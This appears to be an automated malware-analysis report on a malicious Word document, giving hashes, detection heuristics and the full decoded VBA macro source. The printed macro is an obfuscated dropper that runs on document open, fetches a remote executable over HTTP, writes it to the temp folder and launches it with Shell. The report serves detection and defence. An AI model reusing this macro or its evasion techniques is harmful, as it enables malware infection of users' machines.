Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 882a2b15f14bf5fe…

MALICIOUS

Office (OOXML)

25.5 KB Created: 2015-12-01 15:53:00 UTC Authoring application: Microsoft Office Word 15.0000 First seen: 2020-02-04
MD5: 8699bdf1be8fc18bd0265cbe1eaeddeb SHA-1: 36f659e73c071fe049b8e4e44ccba32ac3e42638 SHA-256: 882a2b15f14bf5fe579e7ca42e4b730923c6a3a755284074ef3efe42dd6a6e0d
306 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is an OOXML document containing obfuscated VBA macros. These macros utilize AutoOpen and Workbook_Open to execute, and heuristics indicate they are designed to download and execute a second-stage payload via HTTP. The presence of CreateObject and Shell calls further supports this malicious intent. The ClamAV detection 'Doc.Dropper.Agent-6387882-0' also aligns with this dropper functionality.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6387882-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6387882-0
  • VBA project inside OOXML medium 7 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell oGdyeJdhsdd.bhjsdfvcjdds
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
        xxxcvcxvb.Write jfytwjhdb.responseBody
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
    • http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
    • http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
    • http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 7692 bytes
SHA-256: b0698860c72c6e9b366135ab6d8116217aaec9ec9d74de7bc9f4b0d701d6c2e5
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub JSUrgGsyv()
'tmpo41

Dim JdgReyjd As Integer

Dim ShdwdjJds As Integer
ShdwdjJds = 6
Do While ShdwdjJds < 59
DoEvents: ShdwdjJds = ShdwdjJds + 1
Loop

JdgReyjd = 4
Do While JdgReyjd < 81

Dim uYetBsjfhs As Integer
uYetBsjfhs = 8
Do While uYetBsjfhs < 72
DoEvents: uYetBsjfhs = uYetBsjfhs + 1
Loop

DoEvents: JdgReyjd = JdgReyjd + 1

Loop


Dim PsiosJstwvd As Integer
PsiosJstwvd = 2
Do While PsiosJstwvd < 25
DoEvents: PsiosJstwvd = PsiosJstwvd + 1
Loop

UIkcdidYs
End Sub
Sub AutoOpen()

Dim iUwuUWuxc As Integer

Dim pojxwSdc As Integer
pojxwSdc = 4
Do While pojxwSdc < 77
DoEvents: pojxwSdc = pojxwSdc + 1
Loop

iUwuUWuxc = 6
Do While iUwuUWuxc < 29

Dim FoewfdSy As Integer
FoewfdSy = 9
Do While FoewfdSy < 34
DoEvents: FoewfdSy = FoewfdSy + 1
Loop

DoEvents: iUwuUWuxc = iUwuUWuxc + 1

Loop


Dim AdhsajhEc As Integer
AdhsajhEc = 7
Do While AdhsajhEc < 89
DoEvents: AdhsajhEc = AdhsajhEc + 1
Loop

    JSUrgGsyv
End Sub
Sub Workbook_Open()

Dim IowxJDdsr As Integer

Dim bGdkaJjdsd As Integer
bGdkaJjdsd = 4
Do While bGdkaJjdsd < 71
DoEvents: bGdkaJjdsd = bGdkaJjdsd + 1
Loop

IowxJDdsr = 5
Do While IowxJDdsr < 75

Dim wSfowpcD As Integer
wSfowpcD = 7
Do While wSfowpcD < 88
DoEvents: wSfowpcD = wSfowpcD + 1
Loop

DoEvents: IowxJDdsr = IowxJDdsr + 1
Loop


Dim iAcvpaJHdc As Integer
iAcvpaJHdc = 6
Do While iAcvpaJHdc < 56
DoEvents: iAcvpaJHdc = iAcvpaJHdc + 1
Loop

    JSUrgGsyv
End Sub






Attribute VB_Name = "trekdddjvjb"
Public Function oPlKtRebGf()
hyyuejkjs = "/x16"
yyeidsadf = "56/f"
iuyhgdfsdf = oGdyeJdhsdd.TextBox1
yeuijjffsa = "dgjbhis75.exe"
oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa
End Function




Attribute VB_Name = "oerdkaksnc"
Public Function nHdiPwTgFsd()

nHdiPwTgFsd = Environ(jduyewiskd.uYtbdTsc) & Chr$(47) & Chr$(115) & Chr$(104) & Chr$(101) & Chr$(114) & Chr$(101) & Chr$(100) & Chr$(101) & Chr$(114) + oGdyeJdhsdd.TextBox3

End Function






















Attribute VB_Name = "jduyewiskd"
Public Function uYtbdTsc()
 uYtbdTsc = StrReverse("PMET")
End Function
Public Function IdjcTrsj()
IdjcTrsj = StrReverse("PTTHLMX.tfosorciM")
End Function
Public Function ThWockSv()
ThWockSv = StrReverse("maertS.BDODA")
End Function






















Attribute VB_Name = "aIuhYqZk"
Sub UIkcdidYs()
 
Set dsfgty = CreateObject(jduyewiskd.IdjcTrsj)

Dim uehdbcxsd As Integer
uehdbcxsd = 7
Do While uehdbcxsd < 66
DoEvents: uehdbcxsd = uehdbcxsd + 1
Loop

dsfgty.Open StrReverse("TSOP"), trekdddjvjb.oPlKtRebGf, False

Dim kiwqazbcf As Integer
kiwqazbcf = 5
Do While kiwqazbcf < 78
DoEvents: kiwqazbcf = kiwqazbcf + 1
Loop

dsfgty.send

Dim ieywhdcba As Integer
ieywhdcba = 9
Do While ieywhdcba < 38
DoEvents: ieywhdcba = ieywhdcba + 1
Loop

uwopdhftes dsfgty

Dim tRekfhgwv As Integer
tRekfhgwv = 9
Do While tRekfhgwv < 82
DoEvents: tRekfhgwv = tRekfhgwv + 1
Loop

Shell oGdyeJdhsdd.bhjsdfvcjdds
End Sub

Function uwopdhftes(ByVal jfytwjhdb)

    Set xxxcvcxvb = CreateObject(jduyewiskd.ThWockSv)

Dim OpHfreohd As Integer
OpHfreohd = 4
Do While OpHfreohd < 54
DoEvents: OpHfreohd = OpHfreohd + 1
Loop

    xxxcvcxvb.Open

Dim IuwSjskwq As Integer
IuwSjskwq = 4
Do While IuwSjskwq < 67
DoEvents: IuwSjskwq = IuwSjskwq + 1
Loop

    xxxcvcxvb.Type = 2 - 1

Dim jHewysLd As Integer
jHewysLd = 7
Do While jHewysLd < 84
DoEvents: jHewysLd = jHewysLd + 1
Loop

    xxxcvcxvb.Write jfytwjhdb.responseBody

Dim oYeBsdhd As Integer
oYeBsdhd = 4
Do While oYeBsdhd < 76
DoEvents: oYeBsdhd = oYeBsdhd + 1
Loop

    xxxcvcxvb.SaveToFile oerdkaksnc.nHdiPwTgFsd, 3 - 1

Dim YrtGfdvzw As Integer
YrtGfdvzw = 6
Do While YrtGfdvzw < 63
DoEvents: YrtGfdvzw = YrtGfdvzw + 1
Loop

    xxxcvcxvb.Close

End Function






















Attribute VB_Name = "oGdyeJdhsdd"
Attribute VB_Base = "0{A2FE2FBE-A473-40D1-BACD-006B5703C3FF}{E02A56A1-AB97-4A7D-84A7-6B335CEA197F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub TextBox1_Change()

End Sub

Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class4"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class5"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class6"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class7"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class8"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class9"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Attribute VB_Name = "Class10"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 45056 bytes
SHA-256: 7a2de65114aee78cc5c35c165e912f21b986d09eb51dd727b88fdd8e5f597fc2

Open this report in the interactive analyzer, or submit your own file for analysis.